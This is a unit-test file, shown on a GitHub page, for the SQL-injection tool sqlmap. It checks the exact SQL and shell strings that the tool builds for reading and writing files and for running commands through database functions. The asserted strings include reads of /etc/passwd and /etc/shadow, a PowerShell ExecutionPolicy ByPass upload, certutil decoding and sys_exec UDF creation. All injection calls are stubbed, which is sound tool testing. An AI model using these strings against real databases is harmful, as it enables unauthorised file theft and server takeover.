-
-
Notifications
You must be signed in to change notification settings - Fork 6.4k
Expand file tree
/
Copy pathtest_filesystem.py
More file actions
740 lines (631 loc) · 30.4 KB
/
Copy pathtest_filesystem.py
File metadata and controls
740 lines (631 loc) · 30.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
Unit coverage for the file-read/file-write/UDF-injection SQL & command builders:
- plugins/generic/filesystem.py (encoding, INSERT/UPDATE query forging,
length probe, read/write dispatch)
- plugins/dbms/mssqlserver/filesystem.py
(debug.exe SCR script, BULK INSERT /
bin->hex extraction, PowerShell &
certutil base64 upload commands)
- lib/takeover/udf.py (sys_exec/sys_eval calls, CREATE FUNCTION
SQL for MySQL/PostgreSQL, remote-path
selection, UDF pruning)
These methods are (near-)pure string builders given conf/kb plus the injection
layer. Each test drives the real method with inject.goStacked / inject.getValue
(and, for MSSQL, xpCmdshellWriteFile/execCmd) captured, and asserts the EXACT
SQL / command / encoded payload produced -- so a regression in the assembly
logic fails the test. No live target / network / DBMS involved.
"""
import os
import sys
import tempfile
import unittest
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from _testutils import bootstrap, set_dbms, reset_dbms
bootstrap()
from lib.core.data import conf, kb
from lib.core.convert import encodeHex, encodeBase64, getText
# --------------------------------------------------------------------------- #
# shared base: snapshot/restore every global + monkeypatch these tests touch #
# --------------------------------------------------------------------------- #
class _FsBase(unittest.TestCase):
# subclasses set `target_modules` = list of modules whose inject.* we patch
target_modules = ()
# conf fields read by the methods under test
_CONF_KEYS = ("batch", "direct", "fileRead", "fileWrite", "filePath",
"commonFiles", "osPwn", "osCmd", "osShell", "regRead",
"regAdd", "regDel", "tmpPath", "shLib", "encoding")
_KB_KEYS = ("bruteMode", "binaryField", "fileReadMode")
def setUp(self):
self._conf = {k: conf.get(k) for k in self._CONF_KEYS}
self._kb = {k: kb.get(k) for k in self._KB_KEYS}
self._patched = [] # (obj, attr, original)
conf.batch = True
conf.direct = True
kb.bruteMode = False
def tearDown(self):
for obj, attr, orig in reversed(self._patched):
setattr(obj, attr, orig)
for k, v in self._conf.items():
conf[k] = v
for k, v in self._kb.items():
kb[k] = v
def patch(self, obj, attr, value):
self._patched.append((obj, attr, getattr(obj, attr)))
setattr(obj, attr, value)
return value
# --------------------------------------------------------------------------- #
# plugins/generic/filesystem.py #
# --------------------------------------------------------------------------- #
class TestGenericFilesystem(_FsBase):
import plugins.generic.filesystem as module
def _fs(self):
return self.module.Filesystem()
# -- fileContentEncode ------------------------------------------------- #
def test_fileContentEncode_hex_single(self):
# single=True -> one element, 0x-prefixed, exact lower-case hex of bytes
out = self._fs().fileContentEncode(b"ABC", "hex", True)
self.assertEqual(out, ["0x414243"])
def test_fileContentEncode_base64_single(self):
out = self._fs().fileContentEncode(b"ABC", "base64", True)
self.assertEqual(out, ["'QUJD'"])
def test_fileContentEncode_hex_chunked(self):
# 4 bytes -> 8 hex chars; chunkSize=4 -> two 0x-prefixed chunks of 4 chars
out = self._fs().fileContentEncode(b"ABCD", "hex", False, chunkSize=4)
self.assertEqual(out, ["0x4142", "0x4344"])
def test_fileContentEncode_base64_chunked(self):
# "ABCD" -> base64 "QUJDRA==" (8 chars); chunkSize=4 -> two quoted chunks
out = self._fs().fileContentEncode(b"ABCD", "base64", False, chunkSize=4)
self.assertEqual(out, ["'QUJD'", "'RA=='"])
def test_fileContentEncode_chunk_below_threshold_is_single(self):
# content shorter than chunkSize, single=False -> still one 0x chunk
out = self._fs().fileContentEncode(b"AB", "hex", False, chunkSize=256)
self.assertEqual(out, ["0x4142"])
def test_fileEncode_reads_then_encodes(self):
# fileEncode must read the file bytes and delegate to fileContentEncode
path = os.path.join(
tempfile.gettempdir(), "sqlmap_fe_%d.bin" % os.getpid())
with open(path, "wb") as f:
f.write(b"hello")
try:
out = self._fs().fileEncode(path, "hex", True)
finally:
os.remove(path)
self.assertEqual(out, ["0x%s" % getText(encodeHex(b"hello"))])
self.assertEqual(out, ["0x68656c6c6f"])
# -- fileToSqlQueries -------------------------------------------------- #
def test_fileToSqlQueries_insert_then_concat_update(self):
# first chunk -> INSERT; subsequent -> UPDATE using the DBMS concatenate
# template (MySQL: CONCAT(field, chunk)).
set_dbms("MySQL")
fs = self._fs()
queries = fs.fileToSqlQueries(["0x4142", "0x4344", "0x4546"])
tbl, fld = fs.fileTblName, fs.tblField
self.assertEqual(queries[0],
"INSERT INTO %s(%s) VALUES (0x4142)" % (tbl, fld))
self.assertEqual(queries[1],
"UPDATE %s SET %s=CONCAT(%s,0x4344)" % (tbl, fld, fld))
self.assertEqual(queries[2],
"UPDATE %s SET %s=CONCAT(%s,0x4546)" % (tbl, fld, fld))
# -- _checkFileLength -------------------------------------------------- #
def test_checkFileLength_mysql_query_and_samefile(self):
# MySQL builds LENGTH(LOAD_FILE('<remote>')) and compares to local size.
set_dbms("MySQL")
path = os.path.join(
tempfile.gettempdir(), "sqlmap_cl_%d.bin" % os.getpid())
with open(path, "wb") as f:
f.write(b"12345") # 5 bytes
captured = {}
def getValue(query, *a, **k):
captured["query"] = query
return "5"
self.patch(self.module.inject, "getValue", getValue)
try:
same = self._fs()._checkFileLength(path, "/etc/passwd")
finally:
os.remove(path)
self.assertEqual(captured["query"],
"LENGTH(LOAD_FILE('/etc/passwd'))")
self.assertIs(same, True)
def test_checkFileLength_size_differs(self):
set_dbms("MySQL")
path = os.path.join(
tempfile.gettempdir(), "sqlmap_cl2_%d.bin" % os.getpid())
with open(path, "wb") as f:
f.write(b"12345") # local 5
self.patch(self.module.inject, "getValue", lambda q, *a, **k: "9")
try:
same = self._fs()._checkFileLength(path, "/etc/passwd")
finally:
os.remove(path)
# remote 9 != local 5 -> not the same file
self.assertIs(same, False)
def test_checkFileLength_mssql_openrowset_stacked(self):
# MSSQL path issues an OPENROWSET BULK INSERT then DATALENGTH probe.
# createSupportTbl lives in the misc mixin; stub it on a subclass so the
# OPENROWSET-building branch runs in isolation.
set_dbms("Microsoft SQL Server")
path = os.path.join(
tempfile.gettempdir(), "sqlmap_cl3_%d.bin" % os.getpid())
with open(path, "wb") as f:
f.write(b"ABCD") # 4 bytes
stacked = []
class FS(self.module.Filesystem):
def createSupportTbl(self, *a, **k):
pass
self.patch(self.module.inject, "goStacked",
lambda q, *a, **k: stacked.append(q))
self.patch(self.module.inject, "getValue", lambda q, *a, **k: "4")
fs = FS()
try:
same = fs._checkFileLength(path, "C:\\boot.ini")
finally:
os.remove(path)
tbl, fld = fs.fileTblName, fs.tblField
# createSupportTbl DROP+CREATE, then the OPENROWSET insert
insert = ("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK "
"'C:\\boot.ini', SINGLE_BLOB) AS %s(%s)"
% (tbl, fld, fld, tbl, fld))
self.assertIn(insert, stacked)
self.assertIs(same, True)
def test_checkFileLength_not_written_warns_false(self):
# non-positive remote size -> treated as "not written" -> sameFile False
set_dbms("MySQL")
path = os.path.join(
tempfile.gettempdir(), "sqlmap_cl4_%d.bin" % os.getpid())
with open(path, "wb") as f:
f.write(b"x")
self.patch(self.module.inject, "getValue", lambda q, *a, **k: None)
try:
same = self._fs()._checkFileLength(path, "/etc/passwd")
finally:
os.remove(path)
self.assertIs(same, False)
# -- readFile ---------------------------------------------------------- #
def test_readFile_decodes_hex_and_writes(self):
# Drive the generic readFile orchestration with a stubbed stackedReadFile
# returning canned hex; assert the bytes handed to dataToOutFile are the
# decoded content (raw bytes), and the remote name is passed through.
set_dbms("MySQL")
written = {}
class FS(self.module.Filesystem):
def checkDbmsOs(self):
pass
def cleanup(self, *a, **k):
pass
def stackedReadFile(self, remoteFile):
return encodeHex(b"secret-data", binary=False)
def askCheckReadFile(self, localFile, remoteFile):
return None
def grab(name, data):
written["d"] = (name, data)
return "/out/path"
self.patch(self.module, "dataToOutFile", grab)
out = FS().readFile("/etc/shadow")
self.assertEqual(written["d"][0], "/etc/shadow")
self.assertEqual(written["d"][1], b"secret-data")
self.assertEqual(out, ["/out/path"])
def test_readFile_listlike_chunks_joined(self):
# list-of-chunks return value gets flattened before hex-decoding
set_dbms("MySQL")
written = {}
class FS(self.module.Filesystem):
def checkDbmsOs(self):
pass
def cleanup(self, *a, **k):
pass
def stackedReadFile(self, remoteFile):
# two chunks (each a 1-element list, as inject.getValue returns)
return [[encodeHex(b"AB", binary=False)],
[encodeHex(b"CD", binary=False)]]
def askCheckReadFile(self, localFile, remoteFile):
return True
def grab(name, data):
written["d"] = data
return "/out"
self.patch(self.module, "dataToOutFile", grab)
out = FS().readFile("/f")
self.assertEqual(written["d"], b"ABCD")
# askCheckReadFile True -> suffix annotation
self.assertEqual(out, ["/out (same file)"])
# -- writeFile dispatch ------------------------------------------------ #
def test_writeFile_dispatches_to_stacked(self):
# With stacking available (conf.direct True), writeFile must route to
# stackedWriteFile and return its result.
set_dbms("MySQL")
path = os.path.join(
tempfile.gettempdir(), "sqlmap_wf_%d.bin" % os.getpid())
with open(path, "wb") as f:
f.write(b"data")
calls = {}
class FS(self.module.Filesystem):
def checkDbmsOs(self):
pass
def cleanup(self, *a, **k):
calls["cleanup"] = True
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
calls["args"] = (localFile, remoteFile, fileType, forceCheck)
return True
try:
res = FS().writeFile(path, "/var/www/x", "text", forceCheck=True)
finally:
os.remove(path)
self.assertIs(res, True)
self.assertEqual(calls["args"], (path, "/var/www/x", "text", True))
self.assertTrue(calls["cleanup"])
# --------------------------------------------------------------------------- #
# plugins/dbms/mssqlserver/filesystem.py #
# --------------------------------------------------------------------------- #
class TestMSSQLFilesystem(_FsBase):
import plugins.dbms.mssqlserver.filesystem as module
def _handler(self):
from plugins.dbms.mssqlserver import MSSQLServerMap
set_dbms("Microsoft SQL Server")
return MSSQLServerMap()
# -- _dataToScr (debug.exe script) ------------------------------------- #
def test_dataToScr_header_and_hex_bytes(self):
fs = self._handler()
lines = fs._dataToScr(b"AB", "chunk1")
# header: name / rcx / size(hex) / fill
self.assertEqual(lines[0], "n chunk1")
self.assertEqual(lines[1], "rcx")
self.assertEqual(lines[2], "%x" % 2) # size = 2 bytes
self.assertEqual(lines[3], "f 0100 %x 00" % 2)
# the data 'e' line: base addr 0x100, hex of 'A'(41) and 'B'(42)
self.assertEqual(lines[4], "e 100 41 42")
self.assertEqual(lines[-2], "w")
self.assertEqual(lines[-1], "q")
def test_dataToScr_wraps_lines_and_advances_address(self):
# lineLen=20, so 21 bytes -> two 'e' lines; second starts at 0x100+20=0x114
fs = self._handler()
content = bytes(bytearray(range(21))) # 21 bytes 0x00..0x14
lines = fs._dataToScr(content, "c")
eLines = [ln for ln in lines if ln.startswith("e ")]
self.assertEqual(len(eLines), 2)
self.assertTrue(eLines[0].startswith("e 100 00 01 02"))
# 20 bytes consumed -> next address 0x100+0x14 = 0x114
self.assertTrue(eLines[1].startswith("e 114 14"))
# -- stackedReadFile (BULK INSERT + bin->hex extraction) --------------- #
def test_stackedReadFile_builds_bulk_insert_and_decodes(self):
fs = self._handler()
stacked = []
self.patch(self.module.inject, "goStacked",
lambda q, *a, **k: stacked.append(q))
# UNION available -> single getValue returns the hex content directly
def getValue(query, *a, **k):
return encodeHex(b"file-bytes", binary=False)
self.patch(self.module.inject, "getValue", getValue)
self.patch(self.module, "isTechniqueAvailable", lambda *a, **k: True)
result = fs.stackedReadFile("C:\\secret.txt")
# the BULK INSERT statement loading the file into the support table
bulk = [q for q in stacked if q.startswith("BULK INSERT ")]
self.assertEqual(len(bulk), 1)
self.assertIn("FROM 'C:\\secret.txt'", bulk[0])
self.assertIn("CODEPAGE='RAW'", bulk[0])
# the bin->hex conversion routine must reference the 0..F charset
binhex = [q for q in stacked if "0123456789ABCDEF" in q]
self.assertEqual(len(binhex), 1)
self.assertIn("DATALENGTH", binhex[0])
# result is the raw hex string returned by getValue
self.assertEqual(result, encodeHex(b"file-bytes", binary=False))
def test_stackedReadFile_chunked_when_no_union(self):
# No UNION technique -> COUNT(*) then per-row TOP-1 retrieval into a list
fs = self._handler()
self.patch(self.module.inject, "goStacked", lambda q, *a, **k: None)
self.patch(self.module, "isTechniqueAvailable", lambda *a, **k: False)
chunks = ["41", "42"]
def getValue(query, *a, **k):
if query.startswith("SELECT COUNT(*)"):
return "2"
# the per-index extraction query
if "NOT IN (SELECT TOP" in query:
return chunks.pop(0)
return None
self.patch(self.module.inject, "getValue", getValue)
result = fs.stackedReadFile("C:\\x")
self.assertEqual(result, ["41", "42"])
# -- unionWriteFile is explicitly unsupported -------------------------- #
def test_unionWriteFile_unsupported(self):
from lib.core.exception import SqlmapUnsupportedFeatureException
fs = self._handler()
self.assertRaises(SqlmapUnsupportedFeatureException,
fs.unionWriteFile, "a", "b", "binary")
# -- _stackedWriteFilePS (PowerShell base64) --------------------------- #
def test_stackedWriteFilePS_uploads_base64_and_builds_ps(self):
fs = self._handler()
writes = []
cmds = []
self.patch(fs, "xpCmdshellWriteFile",
lambda content, path, name: writes.append((content, name)))
self.patch(fs, "execCmd", lambda cmd: cmds.append(cmd))
fs._stackedWriteFilePS("C:\\Windows\\Temp", b"payload",
"C:\\out.exe", "binary")
expected_b64 = encodeBase64(b"payload", binary=False)
# the base64 payload goes to the .txt file; the .ps1 holds the decoder.
uploaded = "".join(c for c, name in writes if name.endswith(".txt"))
self.assertEqual(uploaded, expected_b64)
# the powershell command line: ByPass + reference to the .ps1 script
self.assertEqual(len(cmds), 1)
self.assertIn("powershell -ExecutionPolicy ByPass -File", cmds[0])
def test_stackedWriteFilePS_script_decodes_to_remote(self):
# Assert the PS script body contains the FromBase64String + Set-Content
# targeting the exact remote file path.
fs = self._handler()
script = {}
def grab(content, path, name):
if name.endswith(".ps1"):
script["body"] = content
self.patch(fs, "xpCmdshellWriteFile", grab)
self.patch(fs, "execCmd", lambda cmd: None)
fs._stackedWriteFilePS("C:\\T", b"abc", "C:\\target.dll", "binary")
self.assertIn("[System.Convert]::FromBase64String($Base64)", script["body"])
self.assertIn('Set-Content -Path "C:\\target.dll"', script["body"])
# -- _stackedWriteFileCertutilExe (certutil base64) -------------------- #
def test_stackedWriteFileCertutil_splits_b64_and_decodes(self):
fs = self._handler()
writes = []
cmds = []
self.patch(fs, "xpCmdshellWriteFile",
lambda content, path, name: writes.append(content))
self.patch(fs, "execCmd", lambda cmd: cmds.append(cmd))
# >500 chars of base64 so the splitter actually wraps lines
content = b"Z" * 600
fs._stackedWriteFileCertutilExe("C:\\T", "local", content,
"C:\\out.bin", "binary")
b64 = encodeBase64(content, binary=False)
# uploaded text == base64 rejoined on newline at 500-char boundaries
uploaded = writes[0]
self.assertEqual(uploaded.replace("\n", ""), b64)
self.assertEqual(uploaded.split("\n")[0], b64[:500])
# certutil -decode command targeting the remote file
self.assertEqual(len(cmds), 1)
self.assertIn("certutil -f -decode", cmds[0])
self.assertIn("C:\\out.bin", cmds[0])
# --------------------------------------------------------------------------- #
# lib/takeover/udf.py (+ MySQL/PostgreSQL CREATE FUNCTION overrides) #
# --------------------------------------------------------------------------- #
class TestUDF(_FsBase):
import lib.takeover.udf as module
def _udf(self):
u = self.module.UDF()
u.cmdTblName = "cmdtbl"
u.tblField = "data"
return u
# -- udfForgeCmd ------------------------------------------------------- #
def test_udfForgeCmd_wraps_quotes(self):
u = self._udf()
self.assertEqual(u.udfForgeCmd("whoami"), "'whoami'")
# already partially quoted -> not doubled
self.assertEqual(u.udfForgeCmd("'whoami"), "'whoami'")
self.assertEqual(u.udfForgeCmd("whoami'"), "'whoami'")
def _escaped(self, u, cmd):
# mirror udfExecCmd's argument preparation: forge then escape via the
# active DBMS unescaper. (The escaper may hex-encode the literal; we want
# to assert the SELECT wrapping/udf-name wiring, not re-test escaping.)
return self.module.unescaper.escape(u.udfForgeCmd(cmd))
# -- udfExecCmd -------------------------------------------------------- #
def test_udfExecCmd_builds_select_call(self):
set_dbms("MySQL")
u = self._udf()
captured = {}
self.patch(self.module.inject, "goStacked",
lambda q, silent=False: captured.setdefault("q", q))
u.udfExecCmd("id")
# default udfName is sys_exec; arg is the forged+escaped command
self.assertEqual(captured["q"],
"SELECT sys_exec(%s)" % self._escaped(u, "id"))
def test_udfExecCmd_custom_udf_name(self):
set_dbms("MySQL")
u = self._udf()
captured = {}
self.patch(self.module.inject, "goStacked",
lambda q, silent=False: captured.setdefault("q", q))
u.udfExecCmd("id", udfName="my_fn")
self.assertEqual(captured["q"],
"SELECT my_fn(%s)" % self._escaped(u, "id"))
# -- udfEvalCmd -------------------------------------------------------- #
def test_udfEvalCmd_direct_joins_lines(self):
# conf.direct -> uses udfExecCmd output, converting \r to \n
set_dbms("MySQL")
conf.direct = True
u = self._udf()
self.patch(self.module.inject, "goStacked",
lambda q, silent=False: ["foo\rbar", "baz"])
out = u.udfEvalCmd("id")
self.assertEqual(out, "foo\nbarbaz")
def test_udfEvalCmd_stacked_insert_select_delete(self):
# non-direct -> INSERT via UDF, SELECT back, then DELETE
set_dbms("MySQL")
conf.direct = False
u = self._udf()
stacked = []
self.patch(self.module.inject, "goStacked",
lambda q, *a, **k: stacked.append(q))
self.patch(self.module.inject, "getValue",
lambda q, *a, **k: "RESULT")
out = u.udfEvalCmd("id", udfName="sys_eval")
self.assertEqual(
stacked[0],
"INSERT INTO cmdtbl(data) VALUES (sys_eval(%s))"
% self._escaped(u, "id"))
self.assertEqual(stacked[1], "DELETE FROM cmdtbl")
self.assertEqual(out, "RESULT")
# -- udfCheckNeeded (pruning of the sys UDF set) ----------------------- #
def test_udfCheckNeeded_prunes_unrequested_udfs(self):
set_dbms("MySQL")
u = self._udf()
u.sysUdfs = {
"sys_fileread": {}, "sys_bineval": {},
"sys_eval": {}, "sys_exec": {},
}
# nothing requested -> everything irrelevant gets popped
conf.fileRead = conf.commonFiles = None
conf.osPwn = conf.osCmd = conf.osShell = conf.regRead = False
conf.regAdd = conf.regDel = False
u.udfCheckNeeded()
self.assertEqual(u.sysUdfs, {})
def test_udfCheckNeeded_keeps_exec_for_oscmd(self):
set_dbms("MySQL")
u = self._udf()
u.sysUdfs = {
"sys_fileread": {}, "sys_bineval": {},
"sys_eval": {}, "sys_exec": {},
}
conf.fileRead = conf.commonFiles = None
conf.osPwn = False
conf.osCmd = True # requests command exec
conf.osShell = conf.regRead = conf.regAdd = conf.regDel = False
u.udfCheckNeeded()
# sys_eval & sys_exec retained; fileread/bineval pruned
self.assertIn("sys_eval", u.sysUdfs)
self.assertIn("sys_exec", u.sysUdfs)
self.assertNotIn("sys_fileread", u.sysUdfs)
self.assertNotIn("sys_bineval", u.sysUdfs)
def test_udfCheckNeeded_keeps_fileread_for_pgsql_fileread(self):
# sys_fileread is retained ONLY when a file read is requested AND the
# back-end is PostgreSQL (per the explicit DBMS.PGSQL guard).
set_dbms("PostgreSQL")
u = self._udf()
u.sysUdfs = {"sys_fileread": {}, "sys_bineval": {},
"sys_eval": {}, "sys_exec": {}}
conf.fileRead = "/etc/passwd"
conf.commonFiles = None
conf.osPwn = conf.osCmd = conf.osShell = conf.regRead = False
conf.regAdd = conf.regDel = False
u.udfCheckNeeded()
self.assertIn("sys_fileread", u.sysUdfs)
def test_udfCheckNeeded_drops_fileread_for_mysql_fileread(self):
# On MySQL the same file-read request still prunes sys_fileread (the
# guard keeps it only for PostgreSQL).
set_dbms("MySQL")
u = self._udf()
u.sysUdfs = {"sys_fileread": {}, "sys_bineval": {},
"sys_eval": {}, "sys_exec": {}}
conf.fileRead = "/etc/passwd"
conf.commonFiles = None
conf.osPwn = conf.osCmd = conf.osShell = conf.regRead = False
conf.regAdd = conf.regDel = False
u.udfCheckNeeded()
self.assertNotIn("sys_fileread", u.sysUdfs)
# -- udfCheckAndOverwrite --------------------------------------------- #
def test_udfCheckAndOverwrite_new_udf_scheduled(self):
# UDF does not exist -> no overwrite prompt -> scheduled for creation
set_dbms("MySQL")
u = self._udf()
self.patch(self.module.inject, "getValue", lambda q, *a, **k: False)
u.udfCheckAndOverwrite("sys_eval")
self.assertIn("sys_eval", u.udfToCreate)
def test_udfCheckAndOverwrite_existing_no_overwrite(self):
# UDF exists and user declines overwrite -> NOT scheduled
set_dbms("MySQL")
u = self._udf()
self.patch(self.module.inject, "getValue", lambda q, *a, **k: True)
self.patch(u, "_askOverwriteUdf", lambda udf: False)
u.udfCheckAndOverwrite("sys_eval")
self.assertNotIn("sys_eval", u.udfToCreate)
# -- udfInjectCore ----------------------------------------------------- #
def test_udfInjectCore_uploads_and_creates(self):
# Drive the full inject orchestration with the file write succeeding:
# every requested UDF must end up created and the support table built.
set_dbms("MySQL")
calls = {"created": [], "supportType": None}
class U(self.module.UDF):
def __init__(self):
super(U, self).__init__()
self.cmdTblName = "cmdtbl"
self.tblField = "data"
self.udfLocalFile = __file__ # any existing file (checkFile passes)
self.udfRemoteFile = "/tmp/lib.so"
def udfSetRemotePath(self):
pass
def writeFile(self, localFile, remoteFile, fileType, forceCheck=False):
calls["write"] = (remoteFile, fileType, forceCheck)
return True
def udfCreateFromSharedLib(self, udf, inpRet):
calls["created"].append(udf)
self.createdUdf.add(udf)
def udfCreateSupportTbl(self, dataType):
calls["supportType"] = dataType
u = U()
self.patch(self.module.inject, "getValue", lambda q, *a, **k: False)
result = u.udfInjectCore({"sys_eval": {"return": "string"}})
self.assertIs(result, True)
# binary upload forced; remote path threaded through
self.assertEqual(calls["write"], ("/tmp/lib.so", "binary", True))
self.assertEqual(calls["created"], ["sys_eval"])
# MySQL support table uses longtext
self.assertEqual(calls["supportType"], "longtext")
def test_udfInjectCore_noop_when_all_already_created(self):
# If every UDF is already created, nothing is uploaded and it returns True
set_dbms("MySQL")
class U(self.module.UDF):
def writeFile(self, *a, **k):
raise AssertionError("writeFile must not be called")
u = U()
u.createdUdf = {"sys_eval"}
result = u.udfInjectCore({"sys_eval": {"return": "string"}})
self.assertIs(result, True)
self.assertEqual(u.udfToCreate, set())
# -- MySQL udfCreateFromSharedLib (CREATE FUNCTION ... SONAME) --------- #
def test_mysql_udfCreateFromSharedLib_sql(self):
import plugins.dbms.mysql.takeover as mod
set_dbms("MySQL")
t = mod.Takeover()
t.udfToCreate = {"sys_eval"}
t.createdUdf = set()
t.udfSharedLibName = "libsabc"
t.udfSharedLibExt = "so"
stacked = []
self.patch(mod.inject, "goStacked", lambda q, *a, **k: stacked.append(q))
t.udfCreateFromSharedLib("sys_eval", {"return": "string"})
self.assertEqual(stacked[0], "DROP FUNCTION sys_eval")
self.assertEqual(
stacked[1],
"CREATE FUNCTION sys_eval RETURNS string SONAME 'libsabc.so'")
self.assertIn("sys_eval", t.createdUdf)
# -- PostgreSQL udfCreateFromSharedLib (CREATE OR REPLACE FUNCTION) ---- #
def test_pgsql_udfCreateFromSharedLib_sql(self):
import plugins.dbms.postgresql.takeover as mod
set_dbms("PostgreSQL")
t = mod.Takeover()
t.udfToCreate = {"sys_eval"}
t.createdUdf = set()
t.udfRemoteFile = "/tmp/libsabc.so"
stacked = []
self.patch(mod.inject, "goStacked", lambda q, *a, **k: stacked.append(q))
t.udfCreateFromSharedLib(
"sys_eval", {"input": ["text"], "return": "text"})
self.assertEqual(stacked[0], "DROP FUNCTION sys_eval(text)")
self.assertEqual(
stacked[1],
"CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS "
"'/tmp/libsabc.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL "
"INPUT IMMUTABLE")
# -- PostgreSQL udfSetRemotePath (OS-dependent path) ------------------- #
def test_pgsql_udfSetRemotePath_linux_and_windows(self):
# Linux -> /tmp/<lib>; Windows -> bare <lib> (saved into the data dir).
# Set kb.os directly to avoid Backend.setOs()'s interactive OS-mismatch
# prompt when flipping the OS mid-test.
import plugins.dbms.postgresql.takeover as mod
from lib.core.enums import OS
set_dbms("PostgreSQL")
t = mod.Takeover()
t.udfSharedLibName = "libsxyz"
t.udfSharedLibExt = "so"
_os = kb.os
try:
kb.os = OS.LINUX
t.udfSetRemotePath()
self.assertEqual(t.udfRemoteFile, "/tmp/libsxyz.so")
kb.os = OS.WINDOWS
t.udfSharedLibExt = "dll"
t.udfSetRemotePath()
self.assertEqual(t.udfRemoteFile, "libsxyz.dll")
finally:
kb.os = _os
if __name__ == "__main__":
unittest.main()
def tearDownModule():
reset_dbms() # clear any DBMS forced via set_dbms() so it can't leak into later test modules